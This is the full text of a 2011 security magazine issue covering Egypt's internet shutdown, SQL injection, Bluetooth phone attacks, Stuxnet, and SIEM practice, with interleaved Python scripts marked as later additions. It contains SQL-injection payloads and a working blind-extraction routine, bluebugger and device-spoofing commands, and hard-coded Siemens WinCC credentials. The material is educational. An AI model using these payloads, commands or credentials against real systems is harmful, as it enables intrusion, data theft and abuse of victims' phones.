Security Kaizen Magazine, April/June 2011 (2nd Issue)


Editor's Note
April/June 2011, 2nd Issue

After the release of our first issue, we received a lot of positive feedback, a lot of improvement ideas and a lot of reviews. People wanted to help make Security Kaizen magazine a better magazine, and wanted it to be one of the top information security magazines in the world.

To be honest, I didn't expect that we would have that success in such a short period, nor did I expect that one day I'd appear on Egyptian TV to talk about our initiative and our magazine. So I want to attribute our success to all my readers, anyone who contributed with an article or even a small comment, and everyone who criticized our work; all of you guys were a huge help to us. I still have a lot of people to thank for their help in the last couple of months, but the space won't allow me to do that. So thanks everyone, we wouldn't have made it this far without you.

As I said, we are always kaizenning our magazine, and due to the tons of requests we received, a new version of the magazine will be released in Arabic to cover more readers in the Arabic countries. Also, Security Kaizen magazine was able to get special offers for our readers at various worldwide conferences; you can check more details about that through the magazine or on our website.

Finally, this was just a start and we are always eager to kaizen, improve and reach new horizons. We still need more volunteers from all countries, so join us and be part of Security Kaizen magazine and website.

Chairman & Editor-in-Chief: Moataz Salah
Editors: Fady Osman, Brad Smith, Omar Sherin, Osama Kamal, Amr Thabet, Ahmed Saafan, Vinoth Sivasubramanian, Paul de Souza, Mohamed Enab
Language editors: Salma Hisham, Salma Bakr, Lobna Khaled
Graphic Design: Mohamed Fadly
Web Site Design: Mariam Samy

Security Kaizen is issued every 3 months. Reproduction in whole or in part without written permission is strictly prohibited. All copyrights are reserved to the magazine.
For advertisement in Security Kaizen magazine and website: Mail: / Phone: 010 267 5570

Contents
Egypt | The First Cyber Revolution ... 4
Grey Hat: Types of SQL Injection ... 10
Grey Hat: Phone Owning ... 12
Stuxnet: and the truth shall set you free ... 16
A visit to RSA Conference ... 18
Electronic Voting | Security Challenges ... 20
An Interview with Clement Dupuis ... 22
Rootkits: A Deeper Look ... 26
Password Crack ... 30
Best Practice: A Simplified Approach to Achieve Security in a Consumerized Environment ... 34
Cyberspace as a War Fighting Domain ... 38
EGYPT | The First Cyber Revolution
The Full True Story on How Egypt Shut Down the Internet for 5 Whole Days

No one, not even Mark Zuckerberg, the founder of Facebook, nor Jack Dorsey, the founder of Twitter, had imagined that one day their websites would help in a country's revolution, take down a president or change a regime. Egypt's well-educated youth, whose sole dream is to see Egypt a better country, led peaceful demonstrations on the 25th of January 2011, which is the National Police Day, against injustice and the suppression of freedom. Just to give a few examples of people who joined the revolution: Wael Ghoneim (EMEA Marketing Manager of Google), who was arrested by the police on the third day of demonstrations; Dr. Ahmed Zewail (Egyptian Nobel Prize Winner in Chemistry); Dr. Mohamed ElBaradei (former Director General of the International Atomic Energy Agency); and many Egyptian celebrities.

What is unique about this revolution?

It will be recorded in history that Egypt's revolution was the first cyber revolution in the world. On the first three days, protesters used their smart phones, Blackberries or iPhones to guide the demonstrations. It all started with Facebook. Then Twitter played a very crucial role in guiding demonstrators through the streets and in regrouping them after they had been scattered by security agents using water, tear gas or real bullets. On the 11th of February 2011, Hosny Mubarak finally declared his resignation as President of the Arab Republic of Egypt.

By the end of the first day of the revolution, Tuesday 25th of January, Egyptian Intelligence blocked access to Twitter from inside Egypt. They also blocked some online opposition newspapers such as El-Dostor. That didn't stop Egyptians from reaching Twitter and those websites through proxies: within a few minutes a series of proxies and other ways around the block were being shared among Egyptians. Egyptian hackers quickly reacted to those actions by attacking the website of El-Ahram (one of the main Egyptian government newspapers) and that of the Ministry of Interior using DDoS (Distributed Denial of Service) attacks.

We won't continue talking about the revolution and its political development; you can go back to the news for more information. We will now concentrate on the technical part and our view of what happened later, with respect to cutting all means of communication across Egypt.

By the second day, Wednesday 26th of January, Facebook was blocked in some areas, especially in Tahrir Square (Liberty Square), where most protesters gathered. Facebook was totally blocked on the third day of the protests (Thursday 27th of January). During those three days the situation was a real war between the government and the protesters, on the streets and on the web. On Friday 28th of January, in the early morning (Friday is the weekend in most Islamic countries), the following communication services went down:
- All mobile phone communications (voice calls, mobile internet, SMS, etc.), i.e. Egypt's three operators were down completely with all their services.
- All internet connections by all providers (ADSL, dial-up, etc.).
To summarize the situation, all means of communication were down except land-line phones.

How was the Internet cut?

To understand how the Internet was cut in Egypt, we first need to know the physical hierarchy of the Internet in Egypt. We will try to simplify the details as much as possible so that readers with no telecommunication background can grasp how it works. Different countries are connected together by a network of very high bandwidth optical fibers laid in seas and oceans (check Figure 1). The bandwidth of these international lines is sold to ISPs and companies as requested, and then distributed across Egypt over Telecom Egypt cables, which are the only cables available! This is done through what is known as a POP (point of presence). From there the bandwidth is distributed to home end-users or companies. Check Figure 2 for the Internet hierarchy in Egypt.

[Figure 1: Submarine cable disruption map. For Egypt, all international lines have two landing points (Alexandria and Suez). For example, the SEA-ME-WE 4 cable (South East Asia - Middle East - Western Europe) carries telecommunications between Singapore, Malaysia, Thailand, Bangladesh, India, Sri Lanka, Pakistan, United Arab Emirates, Saudi Arabia, Sudan, Egypt, Italy, Algeria and France.]

[Figure 2: Internet hierarchy in Egypt. International cables (SEA-ME-WE 4 / FLAG) land in Alexandria; Telecom Egypt switching and testing rooms feed Telecom Egypt lines to Core POP1, POP2 and POP3; from these, ISP rooms, companies and edge PoPs deliver services to users.]

Therefore, in order to cut the Internet across Egypt you have more than one option:
● The Egyptian government can disconnect all the lines at the source (here the landing point of the international cables in Alexandria). But this would disconnect all the lines connecting Egypt to the outside world, and that was not the case: only 88% of Internet usage in Egypt was down and nearly 12% was still working. So this option was not likely to have been used.
● The authorities can intimidate the ISPs into shutting down their services to users. This was clearly published by Vodafone, which said that Egyptian security agencies ordered it to shut down all mobile services. Shutting down the Internet from the ISP's side can be done in many different ways depending on each ISP's network design, but the easiest way is to withdraw their Border Gateway Protocol routes (BGP is the protocol border routers use to exchange reachability information between different autonomous systems; once an ISP withdraws its prefixes, routers elsewhere simply have no path to its addresses). Most probably this is what happened with most ISPs.
● If an ISP refuses to cut its service (as in Nour's case), the government can cut the service itself through the Telecom Egypt POPs. Nour, however, is not a residential provider and most of its customers are big companies, and the Egyptian security agencies agreed not to cut the Internet for Nour's customers. That made TEdata and LINKdotNET, the biggest service providers in Egypt, complain that Nour was still working and that this might affect their business. That is why Nour also went down on Monday, cut by Telecom Egypt and not by Nour's engineers. So Nour was cut for a business reason, not a security reason.

Why were the Internet and mobile communications cut?

What happened by the end of Friday explains why Egyptian Intelligence cut all communications in the country. This day was named the Friday of Anger: millions of people went out into the streets, and the highest number of deaths was reported on this day as well.

Egyptian Intelligence uses a solution called NarusInsight. The NarusInsight Solution for Intercept, as narus.com says, "delivers unmatched flexibility to intercept IP communications content and identifying information, enabling law enforcement and government organizations around the world to effectively gather evidence of illegal activity in the multifaceted world of IP communications". NarusInsight can monitor users' traffic, including collecting their mail, chats and other data. Built on the NarusInsight Traffic Intelligence System, the NarusInsight Solution for Intercept passively monitors multiple links on the network. It monitors each packet on the network link and analyzes it against a target list input by the providers or directly by a law enforcement agent. If the packet matches the target criteria, it is captured for formatting and delivery to storage, to law enforcement, or directly to optional content rendering and analysis tools.

Egyptian Intelligence or National Security knew that a lot of people would gather on this Friday, and they knew from the previous three days how people were organizing themselves using Twitter, Facebook and SMS. Maybe they also knew more than that! Whatever they knew, the decision was taken to cut all communications, including all Internet and mobile services. Unfortunately this was the most stupid decision possible, because people who were at home, waiting for brothers, sisters, relatives and friends to come back, couldn't communicate with them. They couldn't call their friends, couldn't connect to the Internet to read their latest activities on social media, and couldn't even send a single SMS! So more people went out into the streets, maybe not to protest but merely to show their anger at this decision.

Was the Internet 100% cut across Egypt?

The answer is NO. According to most statistics nearly 88% of Internet connectivity was down. What about the remaining 12%? Well, there were different cases, for example:
- Nour was the only service provider that kept working for 3 of the 5 days (it was down for only 2 days, Monday and Tuesday, and the Internet was back across Egypt on Wednesday).
- All international MPLS lines were working fine, so companies that had MPLS lines through any provider were working for the whole 5 days.
- One solution was to use an international land line to dial up an external service provider in France or any other country using a dial-up modem, but of course this costs a lot.
- Another solution was a satellite connection: this way you don't pass through Telecom Egypt lines at all. Again this is very expensive and still not reliable enough for huge companies, but it is better than nothing.

Conclusion

This story gave us some facts that apply not only to Egypt but to most countries that use the Internet:
- Internet traffic is monitored, especially social media networks. This can be checked in the customers section of narus.com, where you will find that nearly one third of their customers are national governments.
- Today, social media networks are not used only for connecting with friends or for business marketing; they can be used in issues affecting whole countries: revolutions, wars, etc.

This story also gave us some questions, for which we hope to find answers:
- At which level do governments have the right to control essential life facilities, like communications, electricity and others, for civilians, even in cases of emergency?
- Would you support a law, if it doesn't exist in your country, that considers the Internet and telecommunication systems as basic human needs like the electricity and water supply, which can't be cut in such a way?!

Finally, Egypt's story was real proof that the Internet in general, and social media networks in particular, can really change the world. Virtual life can cause revolutions, wars, crimes and more. Egypt started the revolution on the virtual network and transferred it to a real story, a real TRUE STORY.

References
http://www.narus.com

All images included in this article are copyrighted to their respective owners.
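The route-withdrawal mechanism described above can be observed from outside the country by comparing what a BGP route collector sees before and after the withdrawals. The following Python script is an added example, not part of the original article: it diffs two routing-table snapshots and reports which of a country's prefixes disappeared and what fraction of its address space went dark. The snapshots, AS numbers, ISP names and prefixes are constructed for illustration and do not correspond to any real Egyptian provider.

```python
"""Diff two BGP routing-table snapshots and report how much of a country's
address space was withdrawn. Added example, not from the original article.
The snapshots, AS numbers, ISP names and prefixes below are constructed for
illustration only and do not belong to any real Egyptian provider."""
import ipaddress
from collections import defaultdict

# Hypothetical origin ASNs of the country's ISPs (private-use ASN range).
COUNTRY_ASNS = {
    64501: "ResidentialISP-A",
    64502: "ResidentialISP-B",
    64503: "BusinessISP-C",   # stands in for the provider that stayed up longest
}

# Constructed snapshot from a route collector before the shutdown.
# Each entry: (prefix, AS_PATH); the last ASN in the path is the origin.
BEFORE = [
    ("192.0.2.0/24",     "64600 64510 64501"),
    ("198.51.100.0/24",  "64600 64510 64501"),
    ("198.51.100.0/25",  "64600 64510 64501"),  # more-specific inside the /24
    ("203.0.113.0/24",   "64600 64511 64502"),
    ("203.0.113.128/25", "64600 64511 64502"),
    ("198.18.0.0/24",    "64600 64512 64503"),
    ("198.18.1.0/24",    "64600 64512 64503"),
]

# Constructed snapshot after the residential ISPs withdrew their routes:
# the collector no longer has any path to their prefixes.
AFTER = [
    ("198.18.0.0/24", "64600 64512 64503"),
    ("198.18.1.0/24", "64600 64512 64503"),
]


def origin_as(as_path):
    """The origin AS is the last element of the AS_PATH attribute."""
    return int(as_path.split()[-1])


def addresses_per_isp(snapshot):
    """Count reachable addresses per ISP, collapsing overlapping prefixes so a
    /25 announced inside its covering /24 is not counted twice."""
    nets = defaultdict(list)
    for prefix, path in snapshot:
        asn = origin_as(path)
        if asn in COUNTRY_ASNS:
            nets[COUNTRY_ASNS[asn]].append(ipaddress.ip_network(prefix))
    return {
        isp: sum(n.num_addresses for n in ipaddress.collapse_addresses(v))
        for isp, v in nets.items()
    }


def outage_report(before, after):
    """Compare two snapshots: per-ISP address counts, the withdrawn prefixes
    and the fraction of the country's address space that became unreachable."""
    b = addresses_per_isp(before)
    a = addresses_per_isp(after)
    per_isp = {isp: (b[isp], a.get(isp, 0)) for isp in b}
    total_before = sum(b.values())
    total_after = sum(a.get(isp, 0) for isp in b)
    withdrawn = sorted(
        {p for p, _ in before} - {p for p, _ in after},
        key=lambda p: ipaddress.ip_network(p),
    )
    return {
        "per_isp": per_isp,
        "fraction_down": 1 - total_after / total_before,
        "withdrawn": withdrawn,
    }


if __name__ == "__main__":
    report = outage_report(BEFORE, AFTER)
    for isp, (was, now) in report["per_isp"].items():
        print(f"{isp:18s} {was:6d} -> {now:6d} addresses reachable")
    print(f"{report['fraction_down']:.0%} of the country's address space withdrawn")
    print("withdrawn prefixes:", ", ".join(report["withdrawn"]))
```

With real data the two snapshots would be RIB dumps from a public route collector (RIPE RIS or RouteViews) taken before and after the event, and the ASN table would be built from the country's registry allocations; the comparison itself is the same.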
GREY HAT

Types of SQL injection
By Fady Osman

SQL injection is probably the most dangerous known web attack. Sometimes it can lead to remote code execution that gives the hacker full control of the system. In this article we will talk about the types of SQL injection.

1- Error based SQL injection:
In this case the application sends the database errors straight back to the user. Sometimes this happens because the developer of the website didn't turn off debugging on the server. Exploiting error based SQL injection is fairly straightforward. For example, the attacker can force an invalid comparison between an integer and the data he needs to extract. To make things clear, let's see an example (assuming an MS SQL database).

Injection: or 1=user()--
Response: Syntax error converting the nvarchar value 'ahmed' to a column of data type int.

From this example you can see that the user name 'ahmed', which is the output of the user() function, is sent back in the error message. The attacker can retrieve other information from the database the same way.

Tip: If you don't have good experience with databases and the useful functions they offer, you can go to this website, which gives you a cheat-sheet for SQL injection:

2- Union based SQL injection:
Union based SQL injection, as the name suggests, abuses the UNION operator. The basic idea is to append the data that the attacker wants to a result set that is already displayed in the page. See this example from DVWA (a vulnerable web application created for training hackers and for use in educational classes). Inject this code inside the id parameter:

null' union select @@version,2#

The database simply displays the result of the injected query alongside the search results, as you can see in the following image. Another thing to notice here is that the database version string also reveals operating system information, which is something the database administrator should disable.

3- Blind SQL injection:
This is the hacker's last choice, since it takes a fairly long time. I worked once with blind SQL injection and, to be honest, it wasn't a pleasant experience; it took me all night to successfully exploit the vulnerability. Even with tools like sqlmap available, sometimes you need to write your own scripts to successfully exploit blind SQL injection. Now let's talk about how blind SQL injection works. In this case the database will not give you any output, not even an error message, so you need to find another way to retrieve data. This can be done by asking the database questions like "if the first letter of the user name is not an 'a', then wait for 10 seconds", which in the database language is this query:

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'

The above query waits for ten seconds only if the first letter of the user name is not "a". Then you have to do the same for all the other letters of the user name, then move on to the password hashes, and so on. This makes it obvious that using automated tools or scripts is fundamental; otherwise it will take you days to retrieve even the basic information.

About the author: Fady Osman is an information security professional, researcher, and author. He focuses mainly on the areas of exploitation, reverse engineering, web security and C programming. His team won second place in the MIE 2010 competition organized by IEEE Egypt.
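To make the three techniques above concrete on something you can run, here is an added Python example (not from the article) that builds the same vulnerable pattern, a user id spliced straight into the SQL text, against an in-memory SQLite database with a constructed users table, and then exercises it three ways: leaking an engine error, appending attacker-chosen columns with UNION, and extracting a value character by character with a yes/no oracle. The function names lookup_user and lookup_user_safe and the table contents are this example's own. SQLite has no WAITFOR DELAY, so the blind part uses a boolean oracle (the row for id=1 comes back or it doesn't) in place of the article's timing oracle; the extraction loop is the same either way, and it uses a binary search rather than testing every letter, which is what cuts the cost from dozens of requests per character to about seven.

```python
"""Error-, union- and blind-style SQL injection against one vulnerable query,
next to the parameterised fix. Added example, not from the original article.
The database and its rows are constructed; nothing here touches a real site."""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT);
    INSERT INTO users VALUES (1, 'ahmed', '5f4dcc3b5aa765d61d8327deb882cf99');
    INSERT INTO users VALUES (2, 'admin', '21232f297a57a5a743894a0e4a801fc3');
""")


def lookup_user(user_id):
    """Vulnerable: the request parameter is concatenated into the statement."""
    sql = "SELECT name FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def lookup_user_safe(user_id):
    """Fixed: a bound parameter is always a value, never SQL syntax."""
    return conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchall()


# 1. Error based: when the application echoes database errors, a deliberately
#    broken sub-query makes the engine describe itself in the response.
def error_based_probe():
    try:
        lookup_user("1 AND (SELECT 1 FROM no_such_table)")
    except sqlite3.OperationalError as e:
        return str(e)          # e.g. "no such table: no_such_table"
    return ""


# 2. Union based: a never-matching id empties the legitimate result, then UNION
#    appends rows the attacker chooses into the column the page already displays.
def union_based_version():
    return lookup_user("-1 UNION SELECT sqlite_version()")[0][0]


def union_based_dump():
    return lookup_user("-1 UNION SELECT name || ':' || pw_hash FROM users")


# 3. Blind: no data and no error text come back, only whether the row for id=1
#    is shown. Each question narrows one character of the secret by binary search.
def oracle(condition):
    return len(lookup_user("1 AND (" + condition + ")")) == 1


def blind_extract(expr, max_len=32):
    """Recover the string value of a scalar sub-query `expr`, one character at
    a time, using only yes/no answers (about 7 questions per character)."""
    out = ""
    for pos in range(1, max_len + 1):
        char = f"unicode(substr(({expr}), {pos}, 1))"
        if not oracle(f"{char} >= 32"):   # past the end of the string
            break
        lo, hi = 32, 126                  # printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"{char} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    print("error-based  :", error_based_probe())
    print("union version:", union_based_version())
    print("union dump   :", union_based_dump())
    print("blind admin  :", blind_extract("SELECT name FROM users WHERE id = 2"))
    print("fixed query  :", lookup_user_safe("-1 UNION SELECT sqlite_version()"))
```

The last line of the demo is the one that matters for the defender: with the placeholder, the whole injection string is compared as a value against the id column and matches nothing, while the legitimate input "1" still works.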
GREY HAT

Phone owning
By Brad Smith

This article will show you how to get started in performing penetration testing on cell phones to see if they can be compromised by accessing their data via Bluetooth (BT). This is an important part of penetration testing, as many bad things can be done to someone's phone without their knowledge. If they own your phone, they own your life.

This is an advanced article, so you need the following base knowledge: you need to be able to boot a BackTrack 4r2 disk on a computer that has a Bluetooth device installed. You can use other distros if you like, but BackTrack has 32 tools just for Bluetooth.

Bluetooth was designed as a serial port replacement. Just like the serial ports of old, where you had to set an IRQ and a memory address to interact with other devices, Bluetooth needs a channel and memory addresses set to interact with other phones.

Let's Start

With BackTrack booted up to the command line and the Bluetooth adapter installed, type: hciconfig. You should see all the "acceptable" devices. If no device appears on the list and you have the device plugged in, well, your device won't work. Sorry, you need to try a different device. Not all BT adapters are created equal.

If a device appears (hci0) then bring it up, just like it was a wireless card: hciconfig hci0 up

The hciconfig -a command should return a list of features for all the Bluetooth adapters on the computer. It should look like this: [screenshot of hciconfig -a output, not reproduced here]

Let's pretend we're a phone

Notice in the above example that our Service / Device Class shows we're a computer, and that the Link mode is SLAVE ACCEPT. We want to change all of this so we look like another cell phone. Type this at the command prompt:

    hciconfig -a hci0 class 0x500204
    hciconfig -a hci0 lm accept,master
    hciconfig -a hci0 lp rswitch,hold,sniff,park
    hciconfig -a hci0 auth enable
    hciconfig -a hci0 encrypt enable
    hciconfig -a hci0 name Resume

(The class value 0x500204 sets the major device class to Phone with the Cellular minor class, and advertises the Telephony and Object Transfer service classes.) Now run hciconfig -a again and notice the differences. The last command, which changes the name, is important because that's what appears on the other person's screen. Would you take a call from "bt-0" or "Resume" or " "? Notice what the Service / Device Class is now. You're a phone!

Who else is out there?

There are several good tools for scanning on BackTrack: l2ping (that's an L, not the number 1), hcitool scan, sdptool browse and this one, BTScanner. What we're after is the address of the device (think of the MAC address of a network card) and the channel each service is offered on. When you click on a device in BTScanner it gives you more information, specifically the channel of each service offered and the memory addresses of the device.

What Now?

Let's start with a simple program that does lots. My favorite is bluebugger, because you can change option parameters quickly till it works properly. Notice the different modes that bluebugger offers. You can do it all from the command line:

    ~# ./bluebugger -m Ron -c 7 -a xx:xx:xx:xx:xx:xx dial 1900badpeople

Let's look at this command: simply add the channel and the connection name (here it's a blank; I use Resume). Seems too simple, yes? Very true, it doesn't work on every phone that has Bluetooth on, so you need to try lots of different phones. I look at a lot of phones and some brands are easier to penetrate than others. Which ones? It depends on model, make and how it's set up.

With so many Bluetooth tools, here are a few all-purpose basic tools to learn: hciconfig, Bluescan, l2ping, sdptool, hcitool, BTScanner, Bluesnarfer, Bluebugger, Carwhisperer.

The number of Bluetooth devices is growing daily. Security is poor at best; coupled with the predicted increase in mobile threats, NOW is the time to secure your own and your business's Bluetooth devices. Here's help: NIST Special Publication 800-121, "Guide to Bluetooth Security".

About the author: Brad started breaking his toys at a very early age. When he wrote his first computer buffer overflow in 1972, which totally wrecked the university computer system, he realized the potential to break much larger things. Now he spends his time teaching others to break small things that have large importance, like cell phones.
new & NEWS

Stuxnet: and the truth shall set you free
By Omar Sherin

What is Stuxnet? It's the most complicated piece of malware ever written. Up till now there has been wide speculation that it was written by a specific country to attack the Siemens computer control systems used in the nuclear program of Iran. Security experts heavily criticized Siemens because the worm exploited, among many other things, a "hard coded password" in the Siemens system. The Stuxnet worm infected critical energy companies in 125 countries.

Last month the Siemens internal CERT (Computer Emergency Response Team) released some slides about Stuxnet as a form of "official communication" to its constituents. The slides were taken offline a few hours later, but as I was reading through them I decided to take a copy just in case they did just that. In the official slides (Here), Siemens confirmed that Stuxnet was a "targeted" attack, using terms like "targeting a very specific configuration, certain PLC blocks and specific processes or (project)". These bold statements simply mean that Stuxnet's makers had one target in mind, and this should eliminate any theory out there denying that it is state-sponsored malware.

The slides confirmed that the malware is capable of transferring data out of the infected system back to the command and control servers, yet nothing has been proven, especially since the two C&C servers (www[.]mypremierfutbol[.]com and www[.]todaysfutbol[.]com) were brought down by Symantec. "I would like to add that both servers were located in Germany".

Then the Siemens slides claim that all known infections are now clean and that zero enterprise damages were reported. Yet they didn't specify their definition of "damage": is it seeing the enterprise up in flames, or a few bytes of data going out? The slides go on listing the great deeds of Siemens since the discovery of the malware: "white papers, cleaning tools, contacting customers, working with top AV vendors, even magazine interviews". Isn't this what they are paid to do?

What is really strange is their genius conclusion that future infections are "unlikely", due to the fact that the malware pattern is now detected by up-to-date anti-virus programs. Eureka!! Yes, future "Stuxnet" infections might be unlikely, but this is certainly not the end of this type of attack as long as top vendors like Siemens still use "hard coded & publicly available" passwords on critical systems in the year 2010 and don't even admit that this is the REAL problem. I was able to locate the hard coded (built-in) user names and passwords in Siemens technical online forums:

    login='WinCCConnect' password='2WSXcder'
    login='WinCCAdmin' password='2WSXcde

Another statement that also reflects a severe undermining of the terms "due diligence" and "responsibility" is a question they highlighted in yellow: "Has the customer done all he can?". Imagine a car manufacturing company that sold you a very expensive car equipped with an advanced airbag system; then someone smashes into your car and the airbag doesn't work, and while you are in hospital the car company's lawyer asks you why you didn't bring an airbag from home just in case!

About the author: My name is Omar Sherin and I am the OWASP Egypt chapter chair and a member of the OWASP Leaders Board. I have more than 8 years of professional corporate and national level information security experience, plus more years as a security and online privacy advocate. I also hold a diploma from Carnegie Mellon's Tepper School of Business in entrepreneurship and corporate innovation. I've worked for several multinational firms in the oil and gas, communication, government and professional services sectors; in my spare time I'm an active information security blogger and speaker.
Specialties:
• SCADA Security
• Critical Infrastructure Information Protection (CIIP)
• Business Continuity and Disaster Recovery
• Information Security and IT Audit
• Risk Assessment, GAP Analysis, Security policies
• Digital Forensics and web application pen testing
A visit to RSA Conference
By Osama Kamal

RSA Conference is by far the biggest commercial event I have attended. It is not just an expo with more than 400 information security companies; it is also a place where you get to meet information security rock-stars and the top management of big companies. In addition, the event has a lot of sessions, mostly panel discussions, where you listen to the people who are shaping the security industry or are heavily involved in it in one way or another.

My favourite keynote was the one Hugh Thompson gave about social engineering, entitled "People Security". He showed how easily you can mislead people through search engine poisoning, by giving an example of an unusual definition. He then asked people to use their mobile phones and computers to search for that term on the Internet, and showed that a Google search returned a totally wrong definition: he had been able to poison the search results by creating a Wikipedia page and a YouTube video, with some link-building techniques to push the wrong definition to the top of the results.

Hugh Thompson also hosted Alexis Conran, who runs a show on the BBC, The Real Hustle. He showed how easy it is to scam people using "misdirection", which is one part of a good scam. It does not matter how smart you are; even security-conscious people can be scammed. He showed some videos from the show, scamming people in cafes or even in casinos that have very tight security mechanisms to prevent fraud, and the message was to highlight the importance and danger of social engineering attacks. The video is available on the RSA Conference website; highly recommended.

One of the interesting presentations was about mature SIEM implementation, by Bradford Nelson and Ben. It discussed a real implementation in one of the US government entities, where they divided the SIEM evolution into 3 phases: Infancy, Growth, and Maturity. In the Infancy phase, you need to focus on collection and aggregation. In the Growth phase, you need to focus on real-time monitoring, unsupported sources, and environmental modeling. In the Maturity phase, you start developing processes, adding external threat feeds, putting alerts into business context, aggressive normalization and correlation, and adding application/user behaviour analysis.

According to the presenters, you should start by defining your requirements first, then do procurement, design, deployment, and then content delivery. The requirements definition is very important and should not be driven by vendor literature alone; combine it with your own technical and business needs. You can simply look for use cases to understand more. Things to consider are: start slowly (you can use NIST 800-53 and 800-92 as a start); go for quick wins; and do not try to spend lots of time on unsupported logs. Also check your data collection rates, and build your key performance indicators and metrics.

They gave some numbers from their environment, which are pretty insightful if you are planning a SOC:

    Year   Nodes    Records/day   Analysts
    2004      800          46K           5
    2007    4,000           2M          14
    2010   30,000         326M          32

They started with logs like failed logins, port scans, and AD changes. Later they added IPS, packet capture and packet drops, then applications, users, social media, auto-ticketing handlers, honeynet sensors, and all connections. That is a lot to handle!

The conference is an excellent chance to get updated with new technologies from vendors. It is all about the defence side, not the offence side like Black Hat. If you are in the security business, this conference should be your target.

About the author: An independent security analyst with over 13 years of experience in security operations, design, architecture, and incident handling. Running his own blog for almost 2 years, currently focusing on open source information gathering and threat intelligence.
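The collection-then-correlation progression reported above is easier to judge with a concrete rule. The following Python is an added example, not code from the article or from the talk it reports on: it normalises failed-login events from two different log formats into one schema, applies a simple correlation (several failures from one source inside a short window, escalated if a success from the same source follows) and enriches the alert from a threat feed, which is the kind of content the presenters describe adding in the Growth and Maturity phases. The log lines, the Windows event wording, the source addresses and the feed entry are all constructed.

```python
"""Normalise failed-login events from two log formats and correlate them into a
brute-force alert. Added example, not from the original article or the RSA talk;
the log lines, addresses and the threat-feed entry are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed input: an OpenSSH auth log and a flattened Windows logon-failure
# event (ID 4625) from the same hour, as two sources a SIEM would ingest.
LOGS = [
    "2011-04-08T10:00:01 sshd[2001]: Failed password for root from 203.0.113.9 port 51000 ssh2",
    "2011-04-08T10:00:03 sshd[2001]: Failed password for root from 203.0.113.9 port 51001 ssh2",
    "2011-04-08T10:00:05 sshd[2001]: Failed password for admin from 203.0.113.9 port 51002 ssh2",
    "2011-04-08T10:00:09 sshd[2001]: Failed password for admin from 203.0.113.9 port 51003 ssh2",
    "2011-04-08T10:00:12 sshd[2001]: Accepted password for admin from 203.0.113.9 port 51004 ssh2",
    "2011-04-08T10:00:20 sshd[2002]: Failed password for alice from 198.51.100.7 port 40000 ssh2",
    "2011-04-08T10:05:00 WIN EventID=4625 TargetUserName=bob IpAddress=203.0.113.9 Status=0xC000006D",
    "2011-04-08T10:30:00 WIN EventID=4625 TargetUserName=carol IpAddress=198.51.100.7 Status=0xC000006D",
]

# Constructed external threat feed, keyed by source address.
THREAT_FEED = {"203.0.113.9": "constructed-feed: known scanner"}

SSH_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<outcome>Failed|Accepted) password for (?P<user>\S+) from (?P<src>\S+)")
WIN_RE = re.compile(
    r"^(?P<ts>\S+) WIN EventID=(?P<eid>\d+) TargetUserName=(?P<user>\S+) IpAddress=(?P<src>\S+)")


def normalise(line):
    """Map either raw format onto one event schema; unknown lines yield None."""
    m = SSH_RE.match(line)
    if m:
        return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"], "user": m["user"],
                "outcome": "fail" if m["outcome"] == "Failed" else "success", "source": "sshd"}
    m = WIN_RE.match(line)
    if m and m["eid"] == "4625":              # 4625 = an account failed to log on
        return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"], "user": m["user"],
                "outcome": "fail", "source": "windows"}
    return None


def correlate(events, threshold=4, window=timedelta(minutes=1)):
    """Alert when one source produces `threshold` failures inside `window`;
    escalate to high if that source then succeeds within another `window`."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        fails = [e for e in evs if e["outcome"] == "fail"]
        for i in range(len(fails)):
            burst = [f for f in fails[i:] if f["ts"] - fails[i]["ts"] <= window]
            if len(burst) >= threshold:
                end = burst[-1]["ts"]
                success = any(e["outcome"] == "success" and end <= e["ts"] <= end + window
                              for e in evs)
                alerts.append({
                    "src": src,
                    "failures": len(burst),
                    "users": sorted({f["user"] for f in burst}),
                    "sources": sorted({f["source"] for f in burst}),
                    "severity": "high" if success else "medium",
                    "intel": THREAT_FEED.get(src),
                })
                break                          # one alert per source per run
    return alerts


def analyse(lines):
    """Full pipeline: parse, drop unparseable lines, correlate."""
    return correlate([e for e in map(normalise, lines) if e])


if __name__ == "__main__":
    for alert in analyse(LOGS):
        print(alert)
```

The threshold and window are the tunables the talk's "data collection rates" point is about: too low a threshold on a busy SSH gateway floods the five analysts of the 2004 environment, too high a window hides a slow spray. The success-after-burst escalation is what turns a noisy brute-force signal into the one case worth a ticket.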
Electronic Voting: Security Challenges
By Mohamed Enab

“Cyber Revolution”… a catchy expression we use these days! This type of “revolution” is conducted over the Internet using social networks, such as Facebook and Twitter, and this is the first time in history that people start a revolution against unfair and oppressive government systems by a Cyber Revolution.

To help maintain the principles of this revolution and sustain it, so that we can use it any time we are again confronted by governments that lack freedom of speech, we should put some “controls” into our lives to guarantee that we do not reinvent the wheel, especially while no political party is in control and there is some sort of chaos around a certain country. That is the time to put neutral controls over the Cyber Revolution.

I said “controls”, right?! Yes, I did. Does this not remind us, Security Professionals, of something we use in our daily life when referring to Firewalls, IPS, IDS, etc.? But what type of controls am I talking about?!

As we all know, the main objective of Information Security is to protect the confidentiality, integrity and availability of our company, our organization and our country. What I see right now is that people believe in this revolution, and the way to help them trust it more and more is to have a system that makes them feel secure and safe when they give their votes during elections or referendums. We are talking here about “Electronic Voting”.

I know that the idea is not new, and that it has been implemented in lots of countries such as the USA, Spain, Australia and the Netherlands - just to name a few - either by Remote E-Voting or Polling Place E-Voting. However, these systems are not as easy as you might think; they are complex systems that depend on a lot of factors. If the voting software is simply tampered with by a virus or a bug, then you might end up with an undesirable president or parliament member, for example. Therefore, due to its critical risks, and because some countries have already had voting fraud incidents, Electronic Voting needs to be assessed and analyzed well to check whether it can be applied safely in our country. Basically, a voting system has four main characteristics (1):

